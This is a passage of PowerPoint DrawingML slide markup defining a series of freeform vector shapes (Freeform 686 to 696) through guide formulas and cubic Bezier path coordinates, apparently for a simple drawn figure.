                    <a:gd name="T21" fmla="*/ 174 h 231"/>
                    <a:gd name="T22" fmla="*/ 113 w 198"/>
                    <a:gd name="T23" fmla="*/ 188 h 231"/>
                    <a:gd name="T24" fmla="*/ 140 w 198"/>
                    <a:gd name="T25" fmla="*/ 169 h 231"/>
                    <a:gd name="T26" fmla="*/ 140 w 198"/>
                    <a:gd name="T27" fmla="*/ 169 h 231"/>
                    <a:gd name="T28" fmla="*/ 138 w 198"/>
                    <a:gd name="T29" fmla="*/ 87 h 231"/>
                    <a:gd name="T30" fmla="*/ 136 w 198"/>
                    <a:gd name="T31" fmla="*/ 70 h 231"/>
                    <a:gd name="T32" fmla="*/ 136 w 198"/>
                    <a:gd name="T33" fmla="*/ 69 h 231"/>
                    <a:gd name="T34" fmla="*/ 136 w 198"/>
                    <a:gd name="T35" fmla="*/ 70 h 231"/>
                    <a:gd name="T36" fmla="*/ 138 w 198"/>
                    <a:gd name="T37" fmla="*/ 87 h 231"/>
                    <a:gd name="T38" fmla="*/ 159 w 198"/>
                    <a:gd name="T39" fmla="*/ 203 h 231"/>
                    <a:gd name="T40" fmla="*/ 192 w 198"/>
                    <a:gd name="T41" fmla="*/ 194 h 2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8" h="231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6"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="135" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="9"/>
                        <a:pt x="69" y="3"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="3"/>
                        <a:pt x="30" y="11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0"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="157"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="121"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="173"/>
                        <a:pt x="62" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="180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0"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="78"/>
                        <a:pt x="137" y="73"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="75"/>
                        <a:pt x="138" y="81"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="109"/>
                        <a:pt x="148" y="149"/>
                        <a:pt x="159" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="231"/>
                        <a:pt x="198" y="218"/>
                        <a:pt x="192" y="194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4" name="Freeform 686"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3886" y="3390"/>
                  <a:ext cx="156" cy="97"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 9 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 15 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 53 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 30 h 41"/>
                    <a:gd name="T10" fmla="*/ 29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29" y="39"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="37"/>
                        <a:pt x="0" y="25"/>
                        <a:pt x="9" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="21"/>
                        <a:pt x="13" y="16"/>
                        <a:pt x="15" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="53" y="0"/>
                        <a:pt x="53" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="21"/>
                        <a:pt x="47" y="25"/>
                        <a:pt x="57" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="33"/>
                        <a:pt x="46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5" name="Freeform 687"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3865" y="3265"/>
                  <a:ext cx="191" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 39 w 81"/>
                    <a:gd name="T1" fmla="*/ 1 h 80"/>
                    <a:gd name="T2" fmla="*/ 1 w 81"/>
                    <a:gd name="T3" fmla="*/ 41 h 80"/>
                    <a:gd name="T4" fmla="*/ 42 w 81"/>
                    <a:gd name="T5" fmla="*/ 79 h 80"/>
                    <a:gd name="T6" fmla="*/ 80 w 81"/>
                    <a:gd name="T7" fmla="*/ 38 h 80"/>
                    <a:gd name="T8" fmla="*/ 39 w 81"/>
                    <a:gd name="T9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80">
                      <a:moveTo>
                        <a:pt x="39" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="2"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="1" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="63"/>
                        <a:pt x="21" y="80"/>
                        <a:pt x="42" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="78"/>
                        <a:pt x="81" y="60"/>
                        <a:pt x="80" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="17"/>
                        <a:pt x="61" y="0"/>
                        <a:pt x="39" y="1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6" name="Freeform 688"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3865" y="3265"/>
                  <a:ext cx="191" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 39 w 81"/>
                    <a:gd name="T1" fmla="*/ 1 h 80"/>
                    <a:gd name="T2" fmla="*/ 1 w 81"/>
                    <a:gd name="T3" fmla="*/ 41 h 80"/>
                    <a:gd name="T4" fmla="*/ 42 w 81"/>
                    <a:gd name="T5" fmla="*/ 79 h 80"/>
                    <a:gd name="T6" fmla="*/ 80 w 81"/>
                    <a:gd name="T7" fmla="*/ 38 h 80"/>
                    <a:gd name="T8" fmla="*/ 39 w 81"/>
                    <a:gd name="T9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80">
                      <a:moveTo>
                        <a:pt x="39" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="2"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="1" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="63"/>
                        <a:pt x="21" y="80"/>
                        <a:pt x="42" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="78"/>
                        <a:pt x="81" y="60"/>
                        <a:pt x="80" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="17"/>
                        <a:pt x="61" y="0"/>
                        <a:pt x="39" y="1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7" name="Freeform 689"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3938" y="3898"/>
                  <a:ext cx="24" cy="390"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 8 w 10"/>
                    <a:gd name="T1" fmla="*/ 165 h 165"/>
                    <a:gd name="T2" fmla="*/ 9 w 10"/>
                    <a:gd name="T3" fmla="*/ 12 h 165"/>
                    <a:gd name="T4" fmla="*/ 0 w 10"/>
                    <a:gd name="T5" fmla="*/ 0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" h="165">
                      <a:moveTo>
                        <a:pt x="8" y="165"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="131"/>
                        <a:pt x="10" y="16"/>
                        <a:pt x="9" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="8"/>
                        <a:pt x="0" y="7"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:noFill/>
                <a:ln w="6350" cap="rnd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8" name="Freeform 690"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3853" y="3806"/>
                  <a:ext cx="213" cy="579"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 63 w 90"/>
                    <a:gd name="T1" fmla="*/ 20 h 245"/>
                    <a:gd name="T2" fmla="*/ 12 w 90"/>
                    <a:gd name="T3" fmla="*/ 10 h 245"/>
                    <a:gd name="T4" fmla="*/ 3 w 90"/>
                    <a:gd name="T5" fmla="*/ 0 h 245"/>
                    <a:gd name="T6" fmla="*/ 3 w 90"/>
                    <a:gd name="T7" fmla="*/ 36 h 245"/>
                    <a:gd name="T8" fmla="*/ 2 w 90"/>
                    <a:gd name="T9" fmla="*/ 205 h 245"/>
                    <a:gd name="T10" fmla="*/ 44 w 90"/>
                    <a:gd name="T11" fmla="*/ 204 h 245"/>
                    <a:gd name="T12" fmla="*/ 44 w 90"/>
                    <a:gd name="T13" fmla="*/ 211 h 245"/>
                    <a:gd name="T14" fmla="*/ 88 w 90"/>
                    <a:gd name="T15" fmla="*/ 218 h 245"/>
                    <a:gd name="T16" fmla="*/ 89 w 90"/>
                    <a:gd name="T17" fmla="*/ 156 h 245"/>
                    <a:gd name="T18" fmla="*/ 90 w 90"/>
                    <a:gd name="T19" fmla="*/ 7 h 245"/>
                    <a:gd name="T20" fmla="*/ 89 w 90"/>
                    <a:gd name="T21" fmla="*/ 5 h 245"/>
                    <a:gd name="T22" fmla="*/ 89 w 90"/>
                    <a:gd name="T23" fmla="*/ 5 h 245"/>
                    <a:gd name="T24" fmla="*/ 63 w 90"/>
                    <a:gd name="T25" fmla="*/ 20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0" h="245">
                      <a:moveTo>
                        <a:pt x="63" y="20"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="19"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="4" y="4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4"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="206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ubicBezTo>
                        <a:pt x="89" y="140"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90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9" y="5"/>
                        <a:pt x="89" y="5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79" name="Freeform 691"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3853" y="3806"/>
                  <a:ext cx="213" cy="579"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 63 w 90"/>
                    <a:gd name="T1" fmla="*/ 20 h 245"/>
                    <a:gd name="T2" fmla="*/ 12 w 90"/>
                    <a:gd name="T3" fmla="*/ 10 h 245"/>
                    <a:gd name="T4" fmla="*/ 3 w 90"/>
                    <a:gd name="T5" fmla="*/ 0 h 245"/>
                    <a:gd name="T6" fmla="*/ 3 w 90"/>
                    <a:gd name="T7" fmla="*/ 36 h 245"/>
                    <a:gd name="T8" fmla="*/ 2 w 90"/>
                    <a:gd name="T9" fmla="*/ 205 h 245"/>
                    <a:gd name="T10" fmla="*/ 44 w 90"/>
                    <a:gd name="T11" fmla="*/ 204 h 245"/>
                    <a:gd name="T12" fmla="*/ 44 w 90"/>
                    <a:gd name="T13" fmla="*/ 211 h 245"/>
                    <a:gd name="T14" fmla="*/ 88 w 90"/>
                    <a:gd name="T15" fmla="*/ 218 h 245"/>
                    <a:gd name="T16" fmla="*/ 89 w 90"/>
                    <a:gd name="T17" fmla="*/ 156 h 245"/>
                    <a:gd name="T18" fmla="*/ 90 w 90"/>
                    <a:gd name="T19" fmla="*/ 7 h 245"/>
                    <a:gd name="T20" fmla="*/ 89 w 90"/>
                    <a:gd name="T21" fmla="*/ 5 h 245"/>
                    <a:gd name="T22" fmla="*/ 89 w 90"/>
                    <a:gd name="T23" fmla="*/ 5 h 245"/>
                    <a:gd name="T24" fmla="*/ 63 w 90"/>
                    <a:gd name="T25" fmla="*/ 20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0" h="245">
                      <a:moveTo>
                        <a:pt x="63" y="20"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="19"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="4" y="4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4"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="206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ubicBezTo>
                        <a:pt x="89" y="140"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90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9" y="5"/>
                        <a:pt x="89" y="5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80" name="Freeform 692"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3735" y="3419"/>
                  <a:ext cx="468" cy="545"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 192 w 198"/>
                    <a:gd name="T1" fmla="*/ 194 h 231"/>
                    <a:gd name="T2" fmla="*/ 169 w 198"/>
                    <a:gd name="T3" fmla="*/ 49 h 231"/>
                    <a:gd name="T4" fmla="*/ 143 w 198"/>
                    <a:gd name="T5" fmla="*/ 24 h 231"/>
                    <a:gd name="T6" fmla="*/ 100 w 198"/>
                    <a:gd name="T7" fmla="*/ 12 h 231"/>
                    <a:gd name="T8" fmla="*/ 60 w 198"/>
                    <a:gd name="T9" fmla="*/ 2 h 231"/>
                    <a:gd name="T10" fmla="*/ 30 w 198"/>
                    <a:gd name="T11" fmla="*/ 11 h 231"/>
                    <a:gd name="T12" fmla="*/ 4 w 198"/>
                    <a:gd name="T13" fmla="*/ 159 h 231"/>
                    <a:gd name="T14" fmla="*/ 36 w 198"/>
                    <a:gd name="T15" fmla="*/ 168 h 231"/>
                    <a:gd name="T16" fmla="*/ 54 w 198"/>
                    <a:gd name="T17" fmla="*/ 47 h 231"/>
                    <a:gd name="T18" fmla="*/ 53 w 198"/>
                    <a:gd name="T19" fmla="*/ 164 h 231"/>
                    <a:gd name="T20" fmla="*/ 62 w 198"/>
                    <a:gd name="T21" fmla="*/ 174 h 231"/>
                    <a:gd name="T22" fmla="*/ 113 w 198"/>
                    <a:gd name="T23" fmla="*/ 188 h 231"/>
                    <a:gd name="T24" fmla="*/ 140 w 198"/>
                    <a:gd name="T25" fmla="*/ 169 h 231"/>
                    <a:gd name="T26" fmla="*/ 140 w 198"/>
                    <a:gd name="T27" fmla="*/ 169 h 231"/>
                    <a:gd name="T28" fmla="*/ 138 w 198"/>
                    <a:gd name="T29" fmla="*/ 87 h 231"/>
                    <a:gd name="T30" fmla="*/ 136 w 198"/>
                    <a:gd name="T31" fmla="*/ 70 h 231"/>
                    <a:gd name="T32" fmla="*/ 136 w 198"/>
                    <a:gd name="T33" fmla="*/ 69 h 231"/>
                    <a:gd name="T34" fmla="*/ 136 w 198"/>
                    <a:gd name="T35" fmla="*/ 70 h 231"/>
                    <a:gd name="T36" fmla="*/ 138 w 198"/>
                    <a:gd name="T37" fmla="*/ 87 h 231"/>
                    <a:gd name="T38" fmla="*/ 159 w 198"/>
                    <a:gd name="T39" fmla="*/ 203 h 231"/>
                    <a:gd name="T40" fmla="*/ 192 w 198"/>
                    <a:gd name="T41" fmla="*/ 194 h 2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8" h="231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6"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="135" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="9"/>
                        <a:pt x="69" y="3"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="3"/>
                        <a:pt x="30" y="11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0"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="157"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="121"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="173"/>
                        <a:pt x="62" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="180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0"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="78"/>
                        <a:pt x="137" y="73"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="75"/>
                        <a:pt x="138" y="81"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="109"/>
                        <a:pt x="148" y="149"/>
                        <a:pt x="159" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="231"/>
                        <a:pt x="198" y="218"/>
                        <a:pt x="192" y="194"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="CCFFCC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81" name="Freeform 693"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3735" y="3419"/>
                  <a:ext cx="468" cy="545"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 192 w 198"/>
                    <a:gd name="T1" fmla="*/ 194 h 231"/>
                    <a:gd name="T2" fmla="*/ 169 w 198"/>
                    <a:gd name="T3" fmla="*/ 49 h 231"/>
                    <a:gd name="T4" fmla="*/ 143 w 198"/>
                    <a:gd name="T5" fmla="*/ 24 h 231"/>
                    <a:gd name="T6" fmla="*/ 100 w 198"/>
                    <a:gd name="T7" fmla="*/ 12 h 231"/>
                    <a:gd name="T8" fmla="*/ 60 w 198"/>
                    <a:gd name="T9" fmla="*/ 2 h 231"/>
                    <a:gd name="T10" fmla="*/ 30 w 198"/>
                    <a:gd name="T11" fmla="*/ 11 h 231"/>
                    <a:gd name="T12" fmla="*/ 4 w 198"/>
                    <a:gd name="T13" fmla="*/ 159 h 231"/>
                    <a:gd name="T14" fmla="*/ 36 w 198"/>
                    <a:gd name="T15" fmla="*/ 168 h 231"/>
                    <a:gd name="T16" fmla="*/ 54 w 198"/>
                    <a:gd name="T17" fmla="*/ 47 h 231"/>
                    <a:gd name="T18" fmla="*/ 53 w 198"/>
                    <a:gd name="T19" fmla="*/ 164 h 231"/>
                    <a:gd name="T20" fmla="*/ 62 w 198"/>
                    <a:gd name="T21" fmla="*/ 174 h 231"/>
                    <a:gd name="T22" fmla="*/ 113 w 198"/>
                    <a:gd name="T23" fmla="*/ 188 h 231"/>
                    <a:gd name="T24" fmla="*/ 140 w 198"/>
                    <a:gd name="T25" fmla="*/ 169 h 231"/>
                    <a:gd name="T26" fmla="*/ 140 w 198"/>
                    <a:gd name="T27" fmla="*/ 169 h 231"/>
                    <a:gd name="T28" fmla="*/ 138 w 198"/>
                    <a:gd name="T29" fmla="*/ 87 h 231"/>
                    <a:gd name="T30" fmla="*/ 136 w 198"/>
                    <a:gd name="T31" fmla="*/ 70 h 231"/>
                    <a:gd name="T32" fmla="*/ 136 w 198"/>
                    <a:gd name="T33" fmla="*/ 69 h 231"/>
                    <a:gd name="T34" fmla="*/ 136 w 198"/>
                    <a:gd name="T35" fmla="*/ 70 h 231"/>
                    <a:gd name="T36" fmla="*/ 138 w 198"/>
                    <a:gd name="T37" fmla="*/ 87 h 231"/>
                    <a:gd name="T38" fmla="*/ 159 w 198"/>
                    <a:gd name="T39" fmla="*/ 203 h 231"/>
                    <a:gd name="T40" fmla="*/ 192 w 198"/>
                    <a:gd name="T41" fmla="*/ 194 h 2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8" h="231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6"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="135" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="9"/>
                        <a:pt x="69" y="3"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="3"/>
                        <a:pt x="30" y="11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0"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="157"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="121"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="173"/>
                        <a:pt x="62" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="180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0"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="78"/>
                        <a:pt x="137" y="73"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="75"/>
                        <a:pt x="138" y="81"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="109"/>
                        <a:pt x="148" y="149"/>
                        <a:pt x="159" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="231"/>
                        <a:pt x="198" y="218"/>
                        <a:pt x="192" y="194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82" name="Freeform 694"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3886" y="3390"/>
                  <a:ext cx="156" cy="97"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 9 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 15 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 53 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 30 h 41"/>
                    <a:gd name="T10" fmla="*/ 29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29" y="39"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="37"/>
                        <a:pt x="0" y="25"/>
                        <a:pt x="9" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="21"/>
                        <a:pt x="13" y="16"/>
                        <a:pt x="15" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="53" y="0"/>
                        <a:pt x="53" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="21"/>
                        <a:pt x="47" y="25"/>
                        <a:pt x="57" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="33"/>
                        <a:pt x="46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83" name="Freeform 695"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3865" y="3265"/>
                  <a:ext cx="191" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 39 w 81"/>
                    <a:gd name="T1" fmla="*/ 1 h 80"/>
                    <a:gd name="T2" fmla="*/ 1 w 81"/>
                    <a:gd name="T3" fmla="*/ 41 h 80"/>
                    <a:gd name="T4" fmla="*/ 42 w 81"/>
                    <a:gd name="T5" fmla="*/ 79 h 80"/>
                    <a:gd name="T6" fmla="*/ 80 w 81"/>
                    <a:gd name="T7" fmla="*/ 38 h 80"/>
                    <a:gd name="T8" fmla="*/ 39 w 81"/>
                    <a:gd name="T9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80">
                      <a:moveTo>
                        <a:pt x="39" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="2"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="1" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="63"/>
                        <a:pt x="21" y="80"/>
                        <a:pt x="42" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="78"/>
                        <a:pt x="81" y="60"/>
                        <a:pt x="80" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="17"/>
                        <a:pt x="61" y="0"/>
                        <a:pt x="39" y="1"/>
                      </a:cubicBezTo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84" name="Freeform 696"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3865" y="3265"/>
                  <a:ext cx="191" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 39 w 81"/>
                    <a:gd name="T1" fmla="*/ 1 h 80"/>
                    <a:gd name="T2" fmla="*/ 1 w 81"/>
                    <a:gd name="T3" fmla="*/ 41 h 80"/>
                    <a:gd name="T4" fmla="*/ 42 w 81"/>
                    <a:gd name="T5" fmla="*/ 79 h 80"/>
                    <a:gd name="T6" fmla="*/ 80 w 81"/>
                    <a:gd name="T7" fmla="*/ 38 h 80"/>
                    <a:gd name="T8" fmla="*/ 39 w 81"/>
                    <a:gd name="T9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80">
                      <a:moveTo>
                        <a:pt x="39" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="2"/>
                        <a:pt x="0" y="20"/>
